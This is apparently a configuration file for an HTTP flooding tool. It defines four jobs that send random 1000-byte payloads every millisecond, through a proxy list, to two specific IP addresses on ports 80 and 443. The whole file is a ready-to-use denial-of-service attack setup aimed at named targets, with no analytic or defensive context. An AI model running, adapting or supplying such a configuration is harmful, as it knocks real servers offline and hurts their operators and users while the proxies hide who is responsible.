{
  "jobs": 
  [
    {
      "type": "http",
      "args": {
        "address": "212.66.37.43:80",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}",
        "client": { "proxy_urls": "{{ get_proxylist }}" }
      }
    },
    {
      "type": "http",
      "args": {
        "address": "212.66.37.43:443",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}",
        "client": { "proxy_urls": "{{ get_proxylist }}" }
      }
    },
    {
      "type": "http",
      "args": {
        "address": "5.178.80.46:80",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}",
        "client": { "proxy_urls": "{{ get_proxylist }}" }
      }
    },
    {
      "type": "http",
      "args": {
        "address": "5.178.80.46:443",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}",
        "client": { "proxy_urls": "{{ get_proxylist }}" }
      }
    }
  ]
}
